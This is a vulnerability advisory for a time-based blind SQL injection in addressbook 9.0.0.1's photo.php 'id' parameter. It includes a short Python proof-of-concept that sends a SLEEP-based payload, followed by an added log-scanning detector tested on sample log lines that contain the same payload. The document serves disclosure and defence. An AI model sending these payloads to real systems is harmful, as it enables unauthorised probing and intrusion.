Vendor: addressbook
By: David Velazquez a.k.a. d4sh&r000
CVSS: 5.5 (MEDIUM)
Type: SQL Injection
CWE: 89
Product Name: addressbook
Affected Version From: 9.0.0.1
Affected Version To: 9.0.0.1
Patch Exists: NO
Platforms Tested: Ubuntu Server 20.04 LTS
2020

addressbook 9.0.0.1 – ‘id’ SQL Injection

addressbook 9.0.0.1 is vulnerable to time-based blind SQL injection through the 'id' parameter of photo.php. An attacker who manipulates this parameter in the URL can execute arbitrary SQL queries.

Mitigation:

The vendor should sanitize user input and use parameterized queries to prevent SQL injection attacks. Users should ensure they are using the latest version of the software.

Exploit-DB raw data:

# Title: addressbook 9.0.0.1 - 'id' SQL Injection 
# Date: 2020-04-01
# Author: David Velazquez a.k.a. d4sh&r000
# vulnerable application:  https://sourceforge.net/projects/php-addressbook/files/latest/download
# vulnerable version: 9.0.0.1
# Description: addressbook 9.0.0.1 time-based blind SQL injection
# Tested On: Ubuntu Server 20.04 LTS
# Platform: PHP
# Type: webapp

# Use:
# addressbook9-SQLi.py #http://127.0.0.1/photo.php?id=1'


#!/usr/bin/env python
# -*- coding: utf-8 -*-

import sys
import requests

def isVulnerable(URL):
    """Check if the URL is vulnerable to time-based blind SQL injection"""
    response = requests.get(URL+'%27%20AND%20(SELECT%207812%20FROM%20(SELECT(SLEEP(5)))MkTv)%20AND%20%27nRZy%27=%27nRZy')
    s = response.elapsed.total_seconds()
    if s > 5:  # I put a sleep statement to test the bug
        sys.stdout.write('[+] Application is vulnerable!!!\n')
    else:
        sys.stdout.write('[+] Application NOT vulnerable\n')
    
if __name__ == "__main__":
    isVulnerable(sys.argv[1])
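
The request sent by the script above leaves a recognizable entry in the web server's access log. The following is an added example, not part of the original advisory or the addressbook project: it scans Combined Log Format lines for requests to photo.php whose 'id' value is not a plain integer or contains a SQL delay function. The log lines are constructed samples, and the function names and log format are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a Combined Log Format line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# Delay functions used for time-based blind injection on MySQL/MariaDB
DELAY_RE = re.compile(r'\b(?:sleep|benchmark)\s*\(', re.IGNORECASE)

def classify_request(target, endpoint="/photo.php", param="id"):
    """Return 'ok', 'non-numeric-id' or 'time-based-sqli' for one request target."""
    parts = urlsplit(target)
    # endswith() also covers installs under a sub-directory, e.g. /addressbook/photo.php
    if not parts.path.endswith(endpoint):
        return "ok"
    # parse_qs percent-decodes, so %27 and %20 in the probe become ' and space
    values = parse_qs(parts.query, keep_blank_values=True).get(param, [])
    verdict = "ok"
    for value in values:
        if DELAY_RE.search(value):
            return "time-based-sqli"
        if not re.fullmatch(r"[0-9]+", value):
            verdict = "non-numeric-id"
    return verdict

def scan(log_lines):
    """Yield (client_ip, verdict, target) for every suspicious log line."""
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        verdict = classify_request(match.group(1))
        if verdict != "ok":
            yield line.split(" ", 1)[0], verdict, match.group(1)

# Constructed sample lines (documentation IP ranges), not from a real server
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Apr/2020:10:00:01 +0000] "GET /photo.php?id=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Apr/2020:10:00:09 +0000] "GET /photo.php?id=1%27%20AND%20'
    '(SELECT%207812%20FROM%20(SELECT(SLEEP(5)))MkTv)%20AND%20%27nRZy%27=%27nRZy HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Apr/2020:10:00:12 +0000] "GET /photo.php?id=1%27 HTTP/1.1" 200 312',
    '192.0.2.10 - - [01/Apr/2020:10:00:15 +0000] "GET /index.php?id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, verdict, target in scan(SAMPLE_LOG):
        print(f"{verdict:16} {ip:15} {target}")
```

Because a legitimate 'id' is always an integer, the 'non-numeric-id' verdict doubles as the input-validation rule the application itself should enforce before the value reaches a parameterized query.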